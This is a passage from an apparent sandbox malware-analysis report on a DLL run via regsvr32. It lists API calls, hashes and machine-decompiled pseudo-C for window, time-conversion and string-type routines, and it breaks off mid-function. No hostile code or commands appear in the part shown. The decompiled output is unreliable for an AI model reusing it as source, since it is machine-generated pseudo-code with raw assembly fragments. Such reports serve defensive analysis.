                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 10007B8E
                                                                        • GetSystemMetrics.USER32 ref: 10007BA6
                                                                        • GetSystemMetrics.USER32 ref: 10007BAD
                                                                        • lstrcpynA.KERNEL32(?,DISPLAY,00000020), ref: 10007BD3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: System$Metrics$InfoParameterslstrcpyn
                                                                        • String ID: B$DISPLAY
                                                                        • API String ID: 2307409384-3316187204
                                                                        • Opcode ID: 8573ca3a594fcf350d1bc17a37b23e0e63b952d590c658fbeaf9c3e867428680
                                                                        • Instruction ID: f9e3eb19a9beaf27ca7ac5b5242ad86db65a0bc6b8874f4885458b15db7551ae
                                                                        • Opcode Fuzzy Hash: 8573ca3a594fcf350d1bc17a37b23e0e63b952d590c658fbeaf9c3e867428680
                                                                        • Instruction Fuzzy Hash: B6117771A012399FEB12DF658C84B5B7BA8FF05791B118466FD09AE109D374DD40CBD0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10020D81 Relevance: 10.6, APIs: 7, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 10020D8D
                                                                        • GetWindowRect.USER32 ref: 10020DA8
                                                                        • ScreenToClient.USER32 ref: 10020DBB
                                                                        • ScreenToClient.USER32 ref: 10020DC4
                                                                        • EqualRect.USER32 ref: 10020DCE
                                                                        • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 10020DF6
                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 10020E00
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientRectScreen$DeferEqualParent
                                                                        • String ID:
                                                                        • API String ID: 443303494-0
                                                                        • Opcode ID: 817c61356f7b4056e44297cbe386f6cab579009338145abfb40613178538e0f1
                                                                        • Instruction ID: 0a58a577598c21a1846f40493314dc2d021d714bbb101a3e6ae2e9ccd4581a15
                                                                        • Opcode Fuzzy Hash: 817c61356f7b4056e44297cbe386f6cab579009338145abfb40613178538e0f1
                                                                        • Instruction Fuzzy Hash: C1113D7650021AAFDB01DFA5DC84EBBBBBEEF84310B118419F916E7112D770A940CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10030B92 Relevance: 9.3, APIs: 6, Instructions: 326COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 100304C6: PeekMessageA.USER32 ref: 10030507
                                                                          • Part of subcall function 100304C6: SetRectEmpty.USER32(?), ref: 10030528
                                                                          • Part of subcall function 100304C6: GetDesktopWindow.USER32 ref: 10030540
                                                                          • Part of subcall function 100304C6: LockWindowUpdate.USER32(?,00000000), ref: 10030551
                                                                          • Part of subcall function 100304C6: GetDCEx.USER32(?,00000000,00000003), ref: 10030568
                                                                          • Part of subcall function 10028B90: GetModuleHandleA.KERNEL32(GDI32.DLL,?,10030BB9), ref: 10028B98
                                                                          • Part of subcall function 10028B90: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10028BA4
                                                                        • GetWindowRect.USER32 ref: 10030BDC
                                                                          • Part of subcall function 10028BC6: GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,10030BC6,00000000), ref: 10028BCF
                                                                          • Part of subcall function 10028BC6: GetProcAddress.KERNEL32(00000000,SetLayout), ref: 10028BDD
                                                                        • GetWindowRect.USER32 ref: 10030CA6
                                                                        • InflateRect.USER32(?,00000002,00000002), ref: 10030D5E
                                                                          • Part of subcall function 1003033B: OffsetRect.USER32(?,?,?), ref: 10030372
                                                                          • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 10030704
                                                                          • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 1003070F
                                                                          • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 1003071A
                                                                          • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 10030725
                                                                          • Part of subcall function 10030A77: GetCapture.USER32 ref: 10030A88
                                                                          • Part of subcall function 10030A77: SetCapture.USER32(?), ref: 10030A98
                                                                          • Part of subcall function 10030A77: GetCapture.USER32 ref: 10030AA4
                                                                          • Part of subcall function 10030A77: GetMessageA.USER32 ref: 10030ABE
                                                                          • Part of subcall function 10030A77: DispatchMessageA.USER32 ref: 10030AF0
                                                                          • Part of subcall function 10030A77: GetCapture.USER32 ref: 10030B4E
                                                                        • GetWindowRect.USER32 ref: 10030D79
                                                                        • InflateRect.USER32(?,00000002,00000002), ref: 10030E61
                                                                        • InflateRect.USER32(?,00000002,00000002), ref: 10030E74
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$OffsetWindow$Capture$InflateMessage$AddressHandleModuleProc$DesktopDispatchEmptyLockPeekUpdate
                                                                        • String ID:
                                                                        • API String ID: 2136250054-0
                                                                        • Opcode ID: 6d32121b4750971a1268de3c02b9dbf9a02096f53d5083c77dbf25d0c75ce957
                                                                        • Instruction ID: 4b2599bdc0df74788382724407d7fba24e161278d0237bedf51c9f418cb1fd08
                                                                        • Opcode Fuzzy Hash: 6d32121b4750971a1268de3c02b9dbf9a02096f53d5083c77dbf25d0c75ce957
                                                                        • Instruction Fuzzy Hash: E3B14876901618AFCF01CFA4C891DEE7BBAEF4A311F014594FD05AF256D672AE84CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100134E7 Relevance: 9.2, APIs: 6, Instructions: 197COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 80%
                                                                        			E100134E7(void* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t62;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t69;
				intOrPtr _t71;
				void* _t72;
				intOrPtr _t74;
				char _t75;
				intOrPtr _t79;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t90;
				intOrPtr* _t92;
				intOrPtr _t94;
				intOrPtr _t101;
				intOrPtr _t102;
				char _t105;
				signed int _t111;
				intOrPtr _t113;
				intOrPtr _t118;
				intOrPtr* _t121;
				void* _t127;
				intOrPtr _t128;
				intOrPtr* _t129;
				intOrPtr _t132;
				void* _t134;
				intOrPtr _t136;
				intOrPtr _t138;

				_t118 = __edx;
				_t121 = _a4;
				_t101 =  *((intOrPtr*)(_t121 + 4));
				_t62 =  *_t121;
				_t132 = _t101;
				if(_t132 < 0 || _t132 <= 0 && _t62 < 0) {
					L29:
					_t63 = 0;
					__eflags = 0;
					goto L30;
				} else {
					_t134 = _t101 - 0x1000;
					if(_t134 > 0) {
						goto L29;
					}
					if(_t134 < 0) {
						L6:
						_push(_t127);
						E100193FB(_t127, _t135);
						_t102 =  *((intOrPtr*)(_t121 + 4));
						_t136 = _t102;
						_t128 =  *_t121;
						if(_t136 < 0 || _t136 <= 0 && _t128 <= 0x3f480) {
							_t65 = E10018BEF(_t121);
							__eflags =  *0x1004cdec; // 0x1
							_t129 = _t65;
							if(__eflags == 0) {
								L15:
								asm("cdq");
								_t67 =  *0x1004cde8; // 0x7080
								_t123 = _t118;
								asm("cdq");
								_t105 =  *_t129 - _t67;
								__eflags = _t105;
								asm("sbb edi, edx");
								_v12 = _t105;
								_v8 = _t118;
								L16:
								_t68 = E10019490(_t105, _t123, 0x3c, 0);
								__eflags = _t68;
								 *_t129 = _t68;
								if(_t68 < 0) {
									 *_t129 = _t68 + 0x3c;
									_v12 = _v12 + 0xffffffc4;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t69 = E10013780(_v12, _v8, 0x3c, 0);
								asm("cdq");
								asm("adc edi, edx");
								_v12 = _t69 +  *((intOrPtr*)(_t129 + 4));
								_v8 = _t118;
								_t71 = E10019490(_t69 +  *((intOrPtr*)(_t129 + 4)), _t118, 0x3c, 0);
								__eflags = _t71;
								 *((intOrPtr*)(_t129 + 4)) = _t71;
								if(_t71 < 0) {
									 *((intOrPtr*)(_t129 + 4)) = _t71 + 0x3c;
									_v12 = _v12 + 0xffffffc4;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t72 = E10013780(_v12, _v8, 0x3c, 0);
								asm("cdq");
								asm("adc edi, edx");
								_v12 = _t72 +  *((intOrPtr*)(_t129 + 8));
								_v8 = _t118;
								_t74 = E10019490(_t72 +  *((intOrPtr*)(_t129 + 8)), _t118, 0x18, 0);
								__eflags = _t74;
								 *((intOrPtr*)(_t129 + 8)) = _t74;
								if(_t74 < 0) {
									 *((intOrPtr*)(_t129 + 8)) = _t74 + 0x18;
									_v12 = _v12 + 0xffffffe8;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t75 = E10013780(_v12, _v8, 0x18, 0);
								__eflags = _t118;
								_v12 = _t75;
								_v8 = _t118;
								if(__eflags > 0) {
									goto L28;
								} else {
									if(__eflags < 0) {
										L25:
										asm("cdq");
										_t111 = 7;
										 *(_t129 + 0x18) = ( *(_t129 + 0x18) + _t75 + 7) % _t111;
										 *((intOrPtr*)(_t129 + 0xc)) =  *((intOrPtr*)(_t129 + 0xc)) + _v12;
										_t79 =  *((intOrPtr*)(_t129 + 0xc));
										__eflags = _t79;
										if(_t79 > 0) {
											_t60 = _t129 + 0x1c;
											 *_t60 =  *((intOrPtr*)(_t129 + 0x1c)) + _v12;
											__eflags =  *_t60;
										} else {
											 *((intOrPtr*)(_t129 + 0x14)) =  *((intOrPtr*)(_t129 + 0x14)) - 1;
											 *((intOrPtr*)(_t129 + 0xc)) = _t79 + 0x1f;
											 *((intOrPtr*)(_t129 + 0x1c)) = 0x16c;
											 *((intOrPtr*)(_t129 + 0x10)) = 0xb;
										}
										goto L28;
									}
									__eflags = _t75;
									if(_t75 >= 0) {
										goto L28;
									}
									goto L25;
								}
							}
							_push(_t129);
							_t85 = E10019447(0, _t121, _t129, __eflags);
							__eflags = _t85;
							if(_t85 == 0) {
								goto L15;
							}
							_t113 =  *0x1004cdf0; // 0xfffff1f0
							_t86 =  *0x1004cde8; // 0x7080
							asm("cdq");
							asm("cdq");
							asm("sbb edx, edi");
							_v12 =  *_t129 - _t86 + _t113;
							_v8 = _t118;
							 *((intOrPtr*)(_t129 + 0x20)) = 1;
							_t123 = _v8;
							_t105 = _v12;
							goto L16;
						} else {
							_t90 =  *0x1004cde8; // 0x7080
							asm("cdq");
							asm("sbb ecx, edx");
							_v12 = _t128 - _t90;
							_v8 = _t102;
							_t92 = E10018BEF( &_v12);
							_t138 =  *0x1004cdec; // 0x1
							_t129 = _t92;
							if(_t138 != 0) {
								_push(_t129);
								if(E10019447(0, _t121, _t129, _t138) != 0) {
									_t94 =  *0x1004cdf0; // 0xfffff1f0
									asm("cdq");
									_v12 = _v12 - _t94;
									asm("sbb [ebp-0x4], edx");
									_t129 = E10018BEF( &_v12);
									 *((intOrPtr*)(_t129 + 0x20)) = 1;
								}
							}
							L28:
							_t63 = _t129;
							L30:
							return _t63;
						}
					}
					_t135 = _t62;
					if(_t62 > 0) {
						goto L29;
					}
					goto L6;
				}
			}







































                                                                        0x100134e7
                                                                        0x100134ee
                                                                        0x100134f1
                                                                        0x100134f4
                                                                        0x100134f8
                                                                        0x100134fa
                                                                        0x100136ef
                                                                        0x100136ef
                                                                        0x100136ef
                                                                        0x00000000
                                                                        0x1001350a
                                                                        0x1001350a
                                                                        0x10013510
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10013516
                                                                        0x10013520
                                                                        0x10013520
                                                                        0x10013521
                                                                        0x10013526
                                                                        0x10013529
                                                                        0x1001352b
                                                                        0x1001352d
                                                                        0x10013595
                                                                        0x1001359a
                                                                        0x100135a1
                                                                        0x100135a3
                                                                        0x100135de
                                                                        0x100135e0
                                                                        0x100135e3
                                                                        0x100135e8
                                                                        0x100135ea
                                                                        0x100135eb
                                                                        0x100135eb
                                                                        0x100135ed
                                                                        0x100135ef
                                                                        0x100135f2
                                                                        0x100135f5
                                                                        0x100135fa
                                                                        0x100135ff
                                                                        0x10013601
                                                                        0x10013603
                                                                        0x10013608
                                                                        0x1001360a
                                                                        0x1001360e
                                                                        0x1001360e
                                                                        0x1001361b
                                                                        0x10013627
                                                                        0x1001362b
                                                                        0x10013631
                                                                        0x10013634
                                                                        0x10013637
                                                                        0x1001363c
                                                                        0x1001363e
                                                                        0x10013641
                                                                        0x10013646
                                                                        0x10013649
                                                                        0x1001364d
                                                                        0x1001364d
                                                                        0x1001365a
                                                                        0x10013666
                                                                        0x1001366a
                                                                        0x10013670
                                                                        0x10013673
                                                                        0x10013676
                                                                        0x1001367b
                                                                        0x1001367d
                                                                        0x10013680
                                                                        0x10013685
                                                                        0x10013688
                                                                        0x1001368c
                                                                        0x1001368c
                                                                        0x10013699
                                                                        0x1001369e
                                                                        0x100136a0
                                                                        0x100136a3
                                                                        0x100136a6
                                                                        0x00000000
                                                                        0x100136a8
                                                                        0x100136a8
                                                                        0x100136ae
                                                                        0x100136b5
                                                                        0x100136b8
                                                                        0x100136bb
                                                                        0x100136c1
                                                                        0x100136c4
                                                                        0x100136c7
                                                                        0x100136c9
                                                                        0x100136e7
                                                                        0x100136e7
                                                                        0x100136e7
                                                                        0x100136cb
                                                                        0x100136ce
                                                                        0x100136d1
                                                                        0x100136d4
                                                                        0x100136db
                                                                        0x100136db
                                                                        0x00000000
                                                                        0x100136c9
                                                                        0x100136aa
                                                                        0x100136ac
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100136ac
                                                                        0x100136a6
                                                                        0x100135a5
                                                                        0x100135a6
                                                                        0x100135ab
                                                                        0x100135ae
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100135b0
                                                                        0x100135b6
                                                                        0x100135bd
                                                                        0x100135c4
                                                                        0x100135c7
                                                                        0x100135c9
                                                                        0x100135cc
                                                                        0x100135cf
                                                                        0x100135d6
                                                                        0x100135d9
                                                                        0x00000000
                                                                        0x10013539
                                                                        0x10013539
                                                                        0x1001353e
                                                                        0x10013544
                                                                        0x10013547
                                                                        0x1001354a
                                                                        0x1001354d
                                                                        0x10013552
                                                                        0x10013559
                                                                        0x1001355b
                                                                        0x10013561
                                                                        0x1001356a
                                                                        0x10013570
                                                                        0x10013575
                                                                        0x10013576
                                                                        0x1001357d
                                                                        0x10013585
                                                                        0x10013588
                                                                        0x10013588
                                                                        0x1001356a
                                                                        0x100136ea
                                                                        0x100136ea
                                                                        0x100136f1
                                                                        0x100136f4
                                                                        0x100136f4
                                                                        0x1001352d
                                                                        0x10013518
                                                                        0x1001351a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001351a

                                                                        APIs
                                                                          • Part of subcall function 10018BEF: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018C61
                                                                        • __allrem.LIBCMT ref: 100135FA
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1001361B
                                                                        • __allrem.LIBCMT ref: 10013637
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1001365A
                                                                        • __allrem.LIBCMT ref: 10013676
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10013699
                                                                          • Part of subcall function 10019447: __lock.LIBCMT ref: 10019455
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$__lock
                                                                        • String ID:
                                                                        • API String ID: 1282128132-0
                                                                        • Opcode ID: 79635a6e1b24faedbdc9e56547a81b4bda77f7f01b1a66432270eb392f53d183
                                                                        • Instruction ID: c60af2d58918d4078ab001666915cbd37c2ef6b2e54b6b359c888c98dc157d7e
                                                                        • Opcode Fuzzy Hash: 79635a6e1b24faedbdc9e56547a81b4bda77f7f01b1a66432270eb392f53d183
                                                                        • Instruction Fuzzy Hash: CC616DB5A00605EFDB64CF68C88199EBBF5EB44324B21C57EE055EB391E730EE859B40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001843D Relevance: 9.1, APIs: 6, Instructions: 145COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 80%
                                                                        			E1001843D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t42;
				void* _t43;
				short* _t45;
				int _t58;
				int _t62;
				long _t65;
				int _t67;
				void* _t69;
				short* _t77;
				short* _t78;
				int _t79;
				short* _t83;
				short* _t84;
				void* _t85;
				short* _t86;
				void* _t91;

				_t69 = __ecx;
				_push(0x1c);
				_push(0x10042730);
				E10012514(__ebx, __edi, __esi);
				_t83 = 0;
				_t91 =  *0x1004f740 - _t83; // 0x1
				if(_t91 == 0) {
					if(GetStringTypeW(1, 0x10042704, 1, _t85 - 0x1c) == 0) {
						_t65 = GetLastError();
						__eflags = _t65 - 0x78;
						if(_t65 == 0x78) {
							 *0x1004f740 = 2;
						}
					} else {
						 *0x1004f740 = 1;
					}
				}
				_t42 =  *0x1004f740; // 0x1
				if(_t42 == 2 || _t42 == _t83) {
					_t67 =  *(_t85 + 0x1c);
					__eflags = _t67 - _t83;
					if(_t67 == _t83) {
						_t67 =  *0x1004f724; // 0x0
					}
					_t77 =  *(_t85 + 0x18);
					__eflags = _t77;
					if(_t77 == 0) {
						_t77 =  *0x1004f734; // 0x0
					}
					_t43 = E1001A444(_t67, _t67);
					__eflags = _t43 - 0xffffffff;
					if(_t43 != 0xffffffff) {
						__eflags = _t43 - _t77;
						if(__eflags == 0) {
							L29:
							_t78 = GetStringTypeA(_t67,  *(_t85 + 8),  *(_t85 + 0xc),  *(_t85 + 0x10),  *(_t85 + 0x14));
							__eflags = _t83;
							if(__eflags != 0) {
								_push(_t83);
								E100107C8(_t67, _t78, _t83, __eflags);
							}
							_t45 = _t78;
							goto L32;
						}
						_push(0);
						_push(0);
						_push(_t85 + 0x10);
						_push( *(_t85 + 0xc));
						_push(_t43);
						_push(_t77);
						_t83 = E1001A487(_t67, _t77, _t83, __eflags);
						__eflags = _t83;
						if(_t83 == 0) {
							goto L25;
						}
						 *(_t85 + 0xc) = _t83;
						goto L29;
					} else {
						goto L25;
					}
				} else {
					if(_t42 != 1) {
						L25:
						_t45 = 0;
						L32:
						return E1001254F(_t45);
					}
					 *(_t85 - 0x24) = _t83;
					 *(_t85 - 0x20) = _t83;
					if( *(_t85 + 0x18) == _t83) {
						_t62 =  *0x1004f734; // 0x0
						 *(_t85 + 0x18) = _t62;
					}
					_t79 = MultiByteToWideChar( *(_t85 + 0x18), 1 + (0 |  *((intOrPtr*)(_t85 + 0x20)) != _t83) * 8,  *(_t85 + 0xc),  *(_t85 + 0x10), _t83, _t83);
					 *(_t85 - 0x28) = _t79;
					if(_t79 == 0) {
						goto L25;
					} else {
						 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
						_t68 = _t79 + _t79;
						E10010B20(_t79 + _t79 + 0x00000003 & 0xfffffffc, _t69);
						 *(_t85 - 0x18) = _t86;
						_t84 = _t86;
						 *(_t85 - 0x2c) = _t84;
						E10011C50(_t84, 0, _t79 + _t79);
						 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff;
						_t99 = _t84;
						if(_t84 != 0) {
							L15:
							_t58 = MultiByteToWideChar( *(_t85 + 0x18), 1,  *(_t85 + 0xc),  *(_t85 + 0x10), _t84, _t79);
							if(_t58 != 0) {
								 *(_t85 - 0x24) = GetStringTypeW( *(_t85 + 8), _t84, _t58,  *(_t85 + 0x14));
							}
							_t102 =  *(_t85 - 0x20);
							if( *(_t85 - 0x20) != 0) {
								_push(_t84);
								E100107C8(_t68, _t79, _t84, _t102);
							}
							_t45 =  *(_t85 - 0x24);
							goto L32;
						} else {
							_push(_t79);
							_push(2);
							_t84 = E1001382A(_t68, _t79, _t84, _t99);
							if(_t84 == 0) {
								goto L25;
							}
							 *(_t85 - 0x20) = 1;
							goto L15;
						}
					}
				}
			}



















                                                                        0x1001843d
                                                                        0x1001843d
                                                                        0x1001843f
                                                                        0x10018444
                                                                        0x10018449
                                                                        0x1001844b
                                                                        0x10018451
                                                                        0x10018469
                                                                        0x10018473
                                                                        0x10018479
                                                                        0x1001847c
                                                                        0x1001847e
                                                                        0x1001847e
                                                                        0x1001846b
                                                                        0x1001846b
                                                                        0x1001846b
                                                                        0x10018469
                                                                        0x10018488
                                                                        0x10018490
                                                                        0x10018580
                                                                        0x10018583
                                                                        0x10018585
                                                                        0x10018587
                                                                        0x10018587
                                                                        0x1001858d
                                                                        0x10018590
                                                                        0x10018592
                                                                        0x10018594
                                                                        0x10018594
                                                                        0x1001859b
                                                                        0x100185a1
                                                                        0x100185a4
                                                                        0x100185aa
                                                                        0x100185ac
                                                                        0x100185cc
                                                                        0x100185df
                                                                        0x100185e1
                                                                        0x100185e3
                                                                        0x100185e5
                                                                        0x100185e6
                                                                        0x100185eb
                                                                        0x100185ec
                                                                        0x00000000
                                                                        0x100185ec
                                                                        0x100185ae
                                                                        0x100185b0
                                                                        0x100185b5
                                                                        0x100185b6
                                                                        0x100185b9
                                                                        0x100185ba
                                                                        0x100185c3
                                                                        0x100185c5
                                                                        0x100185c7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100185c9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001849e
                                                                        0x100184a1
                                                                        0x100185a6
                                                                        0x100185a6
                                                                        0x100185ee
                                                                        0x100185f6
                                                                        0x100185f6
                                                                        0x100184a7
                                                                        0x100184aa
                                                                        0x100184b0
                                                                        0x100184b2
                                                                        0x100184b7
                                                                        0x100184b7
                                                                        0x100184db
                                                                        0x100184dd
                                                                        0x100184e2
                                                                        0x00000000
                                                                        0x100184e8
                                                                        0x100184e8
                                                                        0x100184ec
                                                                        0x100184f7
                                                                        0x100184fc
                                                                        0x100184ff
                                                                        0x10018501
                                                                        0x10018508
                                                                        0x10018510
                                                                        0x1001852b
                                                                        0x1001852d
                                                                        0x10018546
                                                                        0x10018553
                                                                        0x1001855b
                                                                        0x1001856b
                                                                        0x1001856b
                                                                        0x1001856e
                                                                        0x10018572
                                                                        0x10018574
                                                                        0x10018575
                                                                        0x1001857a
                                                                        0x1001857b
                                                                        0x00000000
                                                                        0x1001852f
                                                                        0x1001852f
                                                                        0x10018530
                                                                        0x10018539
                                                                        0x1001853d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001853f
                                                                        0x00000000
                                                                        0x1001853f
                                                                        0x1001852d
                                                                        0x100184e2

                                                                        APIs
                                                                        • GetStringTypeW.KERNEL32(00000001,10042704,00000001,?,10042730,0000001C,1001294D,00000001,00000020,00000100,?,00000000), ref: 10018461
                                                                        • GetLastError.KERNEL32 ref: 10018473
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000000,10012C1E,00000000,00000000,10042730,0000001C,1001294D,00000001,00000020,00000100,?,00000000), ref: 100184D5
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,00000000,10012C1E,?,00000000), ref: 10018553
                                                                        • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 10018565
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiStringTypeWide$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 3581945363-0
                                                                        • Opcode ID: c5b59c8c516efa9e1f4051a0dd57c54a1c21c008c676a274ba4cfa4b85049daa
                                                                        • Instruction ID: 357f909d61fdf3067703904fdff93fde9d84214a81f0f6dffe892fe1b28005b1
                                                                        • Opcode Fuzzy Hash: c5b59c8c516efa9e1f4051a0dd57c54a1c21c008c676a274ba4cfa4b85049daa
                                                                        • Instruction Fuzzy Hash: D2418071900629ABEB12CF60CC85A9E3BA6FF497A0F114108F810EE191D735DF91DBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002B9F8 Relevance: 9.1, APIs: 6, Instructions: 122windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 61%
                                                                        			E1002B9F8(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v17;
				char _v18;
				signed int _v19;
				char _v28;
				long _v32;
				signed int _v36;
				char _v52;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed char _t63;
				intOrPtr* _t85;
				intOrPtr* _t88;

				_t41 =  *0x1004c470; // 0x303bb91f
				_t88 = __ecx;
				_push( &_v28);
				_push(_a4);
				_v8 = _t41;
				_push(0x417);
				 *((intOrPtr*)( *__ecx + 0x110))();
				_t44 = _a8;
				 *(_t44 + 8) =  *(_t44 + 8) ^ 0x00000004;
				_v18 = 0;
				_v17 = 0;
				 *((char*)(_t44 + 0xa)) = 0;
				 *((char*)(_t44 + 0xb)) = 0;
				if(E10011FB0(_t44,  &_v28, 0x14) != 0) {
					_v36 = E100202AB(_t88);
					E100202DF(_t88, 0x10000000, 0, 0);
					 *((intOrPtr*)( *_t88 + 0x110))(0x416, _a4, 0, __edi);
					_v32 = SendMessageA( *(_t88 + 0x1c), 0x43d, 0, 0);
					SendMessageA( *(_t88 + 0x1c), 0xb, 0, 0);
					SendMessageA( *(_t88 + 0x1c), 0x43c, _v32 + 1, 0);
					SendMessageA( *(_t88 + 0x1c), 0x43c, _v32, 0);
					SendMessageA( *(_t88 + 0x1c), 0xb, 1, 0);
					_t85 = _a8;
					 *((intOrPtr*)( *_t88 + 0x110))(0x415, _a4, _t85);
